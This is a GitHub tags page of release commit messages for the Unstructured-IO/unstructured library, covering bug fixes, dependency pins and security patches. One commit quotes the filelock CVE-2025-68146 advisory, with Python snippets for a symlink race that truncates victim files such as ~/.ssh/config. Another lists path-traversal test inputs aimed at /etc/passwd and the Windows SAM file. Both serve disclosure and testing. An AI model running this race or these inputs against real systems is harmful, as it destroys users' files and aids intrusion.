Skip to content

Tags: Unstructured-IO/unstructured

Tags

0.18.27

Toggle 0.18.27's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
Fix: partially filled inferred layout mark as not extracted (#4169)

This PR fixes an issue where elements with partially filled extracted
text is marked as extracted.

## bug scenario
This PR adds a new unit test to show case a scenario:
- during merging inferred and extracted layout the function
`aggregate_embedded_text_by_block` aggregates extracted text that falls
into an inferred element; and if all text has the flag `is_extracted`
being `"true"` the inferred element is marked as such as well
- however, there can be a case where the extracted text only partially
fills the inferred element. There might be text in the inferred element
region that are not present as extracted text (i.e., require OCR). But
the current logic would still mark this inferred element as
`is_extracted = "true"`

## Fix
The fix adds another check in the function
`aggregate_embedded_text_by_block`: if the intersect over union of
between the source regions and target region cross a given threshold.
This new check correctly identifies the case in the unit test that the
inferred element should be be marked a `is_extracted = "false"`.

0.18.26

Toggle 0.18.26's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
fix: pin deltalake<1.3.0 for ARM64 Docker builds (#4157)

## Summary
- Pin `deltalake<1.3.0` to fix ARM64 Docker build failures

## Problem
`deltalake` 1.3.0 is missing Linux ARM64 wheels due to a builder OOM
issue on their CI. When pip can't find a wheel, it tries to build from
source, which fails because the Wolfi base image doesn't have a C
compiler (`cc`).

This causes the `unstructured-ingest[delta-table]` install to fail,
breaking the ARM64 Docker image.

delta-io/delta-rs#4041

## Solution
Temporarily pin `deltalake<1.3.0` until:
- deltalake publishes ARM64 wheels for 1.3.0+, OR
- unstructured-ingest adds the pin to its `delta-table` extra

## Test plan
- [ ] ARM64 Docker build succeeds

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> Pins a dependency to unblock ARM64 builds and publishes a patch
release.
> 
> - Add `deltalake<1.3.0` to `requirements/ingest/ingest.txt` to avoid
missing Linux ARM64 wheels breaking Docker builds
> - Bump version to `0.18.26` and add corresponding CHANGELOG entry
> 
> <sup>Written by [Cursor
Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit
b4f15b4. This will update automatically
on new commits. Configure
[here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->

Co-authored-by: Claude Opus 4.5 <[email protected]>

0.18.24

Toggle 0.18.24's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
fix(deps): Update security updates [SECURITY] (#4154)

This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) |
`==3.20.0` → `==3.20.1` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.20.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.20.0/3.20.1?slim=true)
|
|
[marshmallow](https://redirect.github.com/marshmallow-code/marshmallow)
([changelog](https://marshmallow.readthedocs.io/en/latest/changelog.html))
| `==3.26.1` → `==3.26.2` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/marshmallow/3.26.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/marshmallow/3.26.1/3.26.2?slim=true)
|
| [pypdf](https://redirect.github.com/py-pdf/pypdf)
([changelog](https://pypdf.readthedocs.io/en/latest/meta/CHANGELOG.html))
| `==6.3.0` → `==6.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/pypdf/6.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pypdf/6.3.0/6.4.0?slim=true)
|
| [urllib3](https://redirect.github.com/urllib3/urllib3)
([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst))
| `==2.5.0` → `==2.6.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-68146](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)

### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local
attackers to corrupt or truncate arbitrary user files through symlink
attacks. The vulnerability exists in both Unix and Windows lock file
creation where filelock checks if a file exists before opening it with
O_TRUNC. An attacker can create a symlink pointing to a victim file in
the time gap between the check and open, causing os.open() to follow the
symlink and truncate the target file.

**Who is impacted:**

All users of filelock on Unix, Linux, macOS, and Windows systems. The
vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with
virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be
corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their
own.

Attack requires local filesystem access and ability to create symlinks
(standard user permissions on Unix; Developer Mode on Windows 10+).
Exploitation succeeds within 1-3 attempts when lock file paths are
predictable.

### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in
UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse
points (symlinks/junctions) before opening files in
WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note:
different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod
0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running
trusted applications

**Warning:** These workarounds provide only partial mitigation. The race
condition remains exploitable. Upgrading to version 3.20.1 is strongly
recommended.

______________________________________________________________________

## Technical Details: How the Exploit Works

### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python

# Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

# Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

# Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

# At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates
the target file.

### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within
1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently
context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only
operation)

### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python

# Victim runs: python -m venv /tmp/myenv
# Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

# Result: /home/victim/.bashrc overwritten with:

# home = /usr/bin/python3
# include-system-site-packages = false

# version = 3.11.2
# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python

# Victim runs: import torch
# PyTorch checks CPU capabilities, uses filelock on cache

# Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

# Result: Trained ML model checkpoint truncated to 0 bytes

# Impact: Weeks of training lost, ML pipeline DoS
```

### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's*
permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is
acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink
attacks

### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos
(@&#8203;tsigouris007)

####
[CVE-2025-68480](https://redirect.github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5)

### Impact

`Schema.load(data, many=True)` is vulnerable to denial of service
attacks. A moderately sized request can consume a disproportionate
amount of CPU time.

### Patches

4.1.2, 3.26.2

### Workarounds

```py

# Fail fast
def load_many(schema, data, **kwargs):
    if not isinstance(data, list):
        raise ValidationError(['Invalid input type.'])
    return [schema.load(item, **kwargs) for item in data]
```

####
[CVE-2025-66019](https://redirect.github.com/py-pdf/pypdf/security/advisories/GHSA-jfx9-29x2-rv3j)

### Impact

An attacker who uses this vulnerability can craft a PDF which leads to a
memory usage of up to 1 GB per stream. This requires parsing the content
stream of a page using the LZWDecode filter.

This is a follow up to
[GHSA-jfx9-29x2-rv3j](https://redirect.github.com/py-pdf/pypdf/security/advisories/GHSA-jfx9-29x2-rv3j)
to align the default limit with the one for *zlib*.

### Patches
This has been fixed in
[pypdf==6.4.0](https://redirect.github.com/py-pdf/pypdf/releases/tag/6.4.0).

### Workarounds
If users cannot upgrade yet, use the line below to overwrite the default
in their code:

```python
pypdf.filters.LZW_MAX_OUTPUT_LENGTH = 75_000_000
```

####
[CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53)

## Impact

urllib3 supports chained HTTP encoding algorithms for response content
according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).

However, the number of links in the decompression chain was unbounded
allowing a malicious server to insert a virtually unlimited number of
compression steps leading to high CPU usage and massive memory
allocation for the decompressed data.

## Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier for
HTTP requests to untrusted sources unless they disable content decoding
explicitly.

## Remediation

Upgrade to at least urllib3 v2.6.0 in which the library limits the
number of links to 5.

If upgrading is not immediately possible, use
[`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
and ensure that `resp.headers["content-encoding"]` contains a safe
number of encodings before reading the response content.

####
[CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

When streaming a compressed response, urllib3 can perform decoding or
decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`,
`deflate`, `br`, or `zstd`). The library must read compressed data from
the network and decompress it until the requested chunk size is met. Any
resulting decompressed data that exceeds the requested amount is held in
an internal buffer for the next read operation.

The decompression logic could cause urllib3 to fully decode a small
amount of highly compressed data in a single operation. This can result
in excessive resource consumption (high CPU usage and massive memory
allocation for the decompressed data; CWE-409) on the client side, even
if the application only requested a small chunk of data.

### Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier to
stream large compressed responses or content from untrusted sources.

`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`,
`readinto(b)` are examples of `urllib3.HTTPResponse` method calls using
the affected logic unless decoding is disabled explicitly.

### Remediation

Upgrade to at least urllib3 v2.6.0 in which the library avoids
decompressing data that exceeds the requested amount.

If your environment contains a package facilitating the Brotli encoding,
upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These
versions are enforced by the `urllib3[brotli]` extra in the patched
versions of urllib3.

### Credits

The issue was reported by @&#8203;Cycloctane.
Supplemental information was provided by @&#8203;stamparm during a
security audit performed by [7ASecurity](https://7asecurity.com/) and
facilitated by [OSTIF](https://ostif.org/).

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.20.1`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.20.0...3.20.1)

<!-- Release notes generated using configuration in .github/release.yml
at main -->

##### What's Changed

- CVE-2025-68146: Fix TOCTOU symlink vulnerability in lock file creation
by [@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#461](https://redirect.github.com/tox-dev/filelock/pull/461)

**Full Changelog**:
<tox-dev/filelock@3.20.0...3.20.1>

</details>

<details>
<summary>marshmallow-code/marshmallow (marshmallow)</summary>

###
[`v3.26.2`](https://redirect.github.com/marshmallow-code/marshmallow/blob/HEAD/CHANGELOG.rst#3262-2025-12-19)

[Compare
Source](https://redirect.github.com/marshmallow-code/marshmallow/compare/3.26.1...3.26.2)

Bug fixes:

- :cve:`2025-68480`: Merge error store messages without rebuilding
collections.
  Thanks 카푸치노 for reporting and :user:`deckar01` for the fix.

</details>

<details>
<summary>py-pdf/pypdf (pypdf)</summary>

###
[`v6.4.0`](https://redirect.github.com/py-pdf/pypdf/blob/HEAD/CHANGELOG.md#Version-641-2025-12-07)

[Compare
Source](https://redirect.github.com/py-pdf/pypdf/compare/6.3.0...6.4.0)

##### Performance Improvements (PI)

- Optimize loop for layout mode text extraction
([#&#8203;3543](https://redirect.github.com/py-pdf/pypdf/issues/3543))

##### Bug Fixes (BUG)

- Do not fail on choice field without /Opt key
([#&#8203;3540](https://redirect.github.com/py-pdf/pypdf/issues/3540))

##### Documentation (DOC)

- Document possible issues with merge\_page and clipping
([#&#8203;3546](https://redirect.github.com/py-pdf/pypdf/issues/3546))
- Add some notes about library security
([#&#8203;3545](https://redirect.github.com/py-pdf/pypdf/issues/3545))

##### Maintenance (MAINT)

- Use CORE\_FONT\_METRICS for widths where possible
([#&#8203;3526](https://redirect.github.com/py-pdf/pypdf/issues/3526))

[Full
Changelog](https://redirect.github.com/py-pdf/pypdf/compare/6.4.0...6.4.1)

</details>

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

###
[`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05)

[Compare
Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0)

\==================

## Security

- Fixed a security issue where streaming API could improperly handle
highly
compressed HTTP content ("decompression bombs") leading to excessive
resource
consumption even when a small amount of data was requested. Reading
small
  chunks of compressed data is safer and much more efficient now.
(`GHSA-2xpw-w6gg-jr37
<https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37>`\_\_)
- Fixed a security issue where an attacker could compose an HTTP
response with
virtually unlimited links in the `Content-Encoding` header, potentially
leading to a denial of service (DoS) attack by exhausting system
resources
during decoding. The number of allowed chained encodings is now limited
to 5.
(`GHSA-gm62-xv2j-4w53
<https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53>`\_\_)

.. caution::

- If urllib3 is not installed with the optional `urllib3[brotli]` extra,
but
your environment contains a Brotli/brotlicffi/brotlipy package anyway,
make
  sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to
  benefit from the security fixes and avoid warnings. Prefer using
`urllib3[brotli]` to install a compatible Brotli package automatically.

- If you use custom decompressors, please make sure to update them to
  respect the changed API of `urllib3.response.ContentDecoder`.

## Features

- Enabled retrieval, deletion, and membership testing in
`HTTPHeaderDict` using bytes keys. (`#&#8203;3653
<https://github.com/urllib3/urllib3/issues/3653>`\_\_)
- Added host and port information to string representations of
`HTTPConnection`. (`#&#8203;3666
<https://github.com/urllib3/urllib3/issues/3666>`\_\_)
- Added support for Python 3.14 free-threading builds explicitly.
(`#&#8203;3696 <https://github.com/urllib3/urllib3/issues/3696>`\_\_)

## Removals

- Removed the `HTTPResponse.getheaders()` method in favor of
`HTTPResponse.headers`.
Removed the `HTTPResponse.getheader(name, default)` method in favor of
`HTTPResponse.headers.get(name, default)`. (`#&#8203;3622
<https://github.com/urllib3/urllib3/issues/3622>`\_\_)

## Bugfixes

- Fixed redirect handling in `urllib3.PoolManager` when an integer is
passed
for the retries parameter. (`#&#8203;3649
<https://github.com/urllib3/urllib3/issues/3649>`\_\_)
- Fixed `HTTPConnectionPool` when used in Emscripten with no explicit
port. (`#&#8203;3664
<https://github.com/urllib3/urllib3/issues/3664>`\_\_)
- Fixed handling of `SSLKEYLOGFILE` with expandable variables.
(`#&#8203;3700 <https://github.com/urllib3/urllib3/issues/3700>`\_\_)

## Misc

- Changed the `zstd` extra to install `backports.zstd` instead of
`zstandard` on Python 3.13 and before. (`#&#8203;3693
<https://github.com/urllib3/urllib3/issues/3693>`\_\_)
- Improved the performance of content decoding by optimizing
`BytesQueueBuffer` class. (`#&#8203;3710
<https://github.com/urllib3/urllib3/issues/3710>`\_\_)
- Allowed building the urllib3 package with newer setuptools-scm v9.x.
(`#&#8203;3652 <https://github.com/urllib3/urllib3/issues/3652>`\_\_)
- Ensured successful urllib3 builds by setting Hatchling requirement to
>= 1.27.0. (`#&#8203;3638
<https://github.com/urllib3/urllib3/issues/3638>`\_\_)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Renovate
Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42Ni4zIiwidXBkYXRlZEluVmVyIjoiNDIuNjYuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsic2VjdXJpdHkiXX0=-->

Co-authored-by: utic-renovate[bot] <235200891+utic-renovate[bot]@users.noreply.github.com>

0.18.22

Toggle 0.18.22's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
fix(deps): Bump fonttools to address cve (#4125)

<!-- CURSOR_SUMMARY -->
> [!NOTE]
> Constrain fonttools to >=4.60.2 (CVE-2025-66034), bump extras to
4.61.0, switch setup_ingest to ubuntu-latest-m, and release 0.18.22.
> 
> - **Dependencies**:
> - Constrain `fonttools>=4.60.2` in `requirements/deps/constraints.txt`
to address CVE-2025-66034.
> - Bump `fonttools` to `4.61.0` in `requirements/extra-*.txt`; refresh
files via uv and align constraint references.
> - **CI**:
> - Update `setup_ingest` job in `.github/workflows/ci.yml` to run on
`ubuntu-latest-m`.
> - **Release**:
>   - Bump version to `0.18.22` and update `CHANGELOG.md`.
> 
> <sup>Written by [Cursor
Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit
6ec072e. This will update automatically
on new commits. Configure
[here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->

0.18.21

Toggle 0.18.21's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
chore: dependency updates to resolve cves (#4124)

<!-- CURSOR_SUMMARY -->
> [!NOTE]
> Release 0.18.21 with broad dependency pin updates across requirements
(notably unstructured-inference 1.1.2) to remediate CVEs.
> 
> - **Release**
>   - Set version to `0.18.21` and update `CHANGELOG.md`.
> - **Dependencies**
> - Upgrade `unstructured-inference` to `1.1.2` in
`requirements/extra-pdf-image.txt` to address CVEs.
> - Refresh pins across `requirements/*.txt` (base, dev, test, and
extras), including updates like `certifi`, `click`, `pypdf`, `pypandoc`,
`paddlepaddle`, `torch`/`torchvision`, `google-auth` stack, `protobuf`,
`safetensors`, etc.; normalize pip-compile headers and constraint paths.
> 
> <sup>Written by [Cursor
Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit
face075. This will update automatically
on new commits. Configure
[here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->

0.18.20

Toggle 0.18.20's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
chore: minor CHANGELOG.md update (#4122)

last release actually should have been 0.18.19. let's skip it and just
fix the CHANGELOG

0.18.18

Toggle 0.18.18's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
fix: sanitize MSG attachment filenames to prevent path traversal (GHS… (

#4117)

Summary

Fixes path traversal vulnerability in email and MSG attachment filename
handling (GHSA-gm8q-m8mv-jj5m).

Changes

Security Fix

Sanitizes attachment filenames in _AttachmentPartitioner for both
email.py and msg.py
Uses os.path.basename() to strip path components from filenames
Normalizes backslashes to forward slashes to handle Windows paths on
Unix systems
Removes null bytes and other control characters
Handles edge cases (empty strings, ".", "..")
Defaults to "unknown" for invalid or dangerous filenames
Test Coverage

Added 17 comprehensive tests covering:

Path traversal attempts (../../../etc/passwd)
Absolute Unix paths (/etc/passwd)
Absolute Windows paths (C:\Windows\System32\config\sam)
Null byte injection (file\x00.txt)
Dot and dotdot filenames (. and ..)
Missing/empty filenames
Complex mixed path separators
Valid filenames (ensuring they pass through unchanged)
Test Results

✅ All 17 new security tests pass
✅ All 129 existing tests pass
✅ No regressions
Security Impact

Prevents attackers from using malicious attachment filenames to write
files outside the intended directory, which could lead to arbitrary file
write vulnerabilities.

Changes include comprehensive test coverage for various attack vectors
and a version bump to 0.18.18.

---------

Co-authored-by: Claude <[email protected]>

0.18.15

Toggle 0.18.15's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
Luke/sept16 CVE (#4094)

dependancy bump and version bump. mainly to resolve the crit in deepdif

---------

Co-authored-by: cragwolfe <[email protected]>

0.18.14

Toggle 0.18.14's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
manual fix for open CVEs (#4085)

unstructured_0.18.14

Toggle unstructured_0.18.14's commit message

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
manual fix for open CVEs (#4085)